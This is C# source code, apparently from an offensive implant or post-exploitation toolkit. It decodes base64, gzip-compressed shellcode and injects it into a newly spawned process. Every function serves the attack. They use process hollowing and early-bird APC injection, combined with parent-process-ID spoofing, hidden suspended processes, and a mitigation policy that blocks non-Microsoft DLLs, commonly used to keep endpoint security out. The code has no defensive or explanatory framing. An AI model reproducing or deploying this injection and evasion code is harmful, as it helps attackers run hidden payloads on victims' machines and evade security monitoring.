public static string PPidProcHollowRun(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
PPID.ParentPidSpoofing Parent = new PPID.ParentPidSpoofing();
PROCESS_INFORMATION pinf = Parent.ParentSpoofing(SearchPID.SearchForPPID(), targetProcess);
ProcessHollowing hollow = new ProcessHollowing();
hollow.CreateSection((uint)buffer.Length);
hollow.FindEntry(pinf.hProcess);
hollow.SetLocalSection((uint)buffer.Length);
hollow.CopyShellcode(buffer);
hollow.MapAndStart(pinf);
Interop.CloseHandle(pinf.hThread);
Interop.CloseHandle(pinf.hProcess);
return(null);
}
public static string InjectAPCPPID(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
int parentId = SearchPID.SearchForPPID();
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
var lpValueProc = IntPtr.Zero;
STARTUPINFOEX siEx = new STARTUPINFOEX();
flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
var processSecurity = new flags.SECURITY_ATTRIBUTES();
var threadSecurity = new flags.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
var lpSize = IntPtr.Zero;
Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
if (IntPtr.Size == 4)
{
Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
}
else
{
Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
}
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValueProc, parentHandle);
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
Interop.ResumeThread(ThreadHandle);
handle.Free();
}
catch (Exception ex)
{
handle.Free();
Console.WriteLine(ex.Message);
}
return(null);
}
// https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with-startupinfoex-from-c-sharp-and-re-parent-the-ch
public PROCESS_INFORMATION ParentSpoofing(int parentID, string childPath)
{
parentID = SearchPID.SearchForPPID();
// https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with-startupinfoex-from-c-sharp-and-re-parent-the-ch
const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
const int STARTF_USESTDHANDLES = 0x00000100;
const int STARTF_USESHOWWINDOW = 0x00000001;
const ushort SW_HIDE = 0x0000;
// Mitigation Policy
const long BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;
const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
var pInfo = new PROCESS_INFORMATION();
var siEx = new STARTUPINFOEX();
IntPtr lpValueProc = IntPtr.Zero;
IntPtr hSourceProcessHandle = IntPtr.Zero;
var lpSize = IntPtr.Zero;
Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
if (IntPtr.Size == 4)
{
Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
}
else
{
Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
}
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
IntPtr parentHandle = Interop.OpenProcess((uint)ProcessAccessRights.CreateProcess | (uint)ProcessAccessRights.DuplicateHandle, false, (uint)parentID);
lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValueProc, parentHandle);
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
siEx.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
siEx.StartupInfo.wShowWindow = SW_HIDE;
var ps = new SECURITY_ATTRIBUTES();
var ts = new SECURITY_ATTRIBUTES();
ps.nLength = Marshal.SizeOf(ps);
ts.nLength = Marshal.SizeOf(ts);
try
{
bool ProcCreate = Interop.CreateProcess(childPath, null, ref ps, ref ts, true, flags.ProcessCreationFlags.CREATE_SUSPENDED | flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_NO_WINDOW, IntPtr.Zero, null, ref siEx, out pInfo);
if (!ProcCreate)
{
}
}
catch (Exception ex)
{
Console.WriteLine("[+] " + Marshal.GetExceptionCode());
Console.WriteLine(ex.Message);
}
return(pInfo);
}
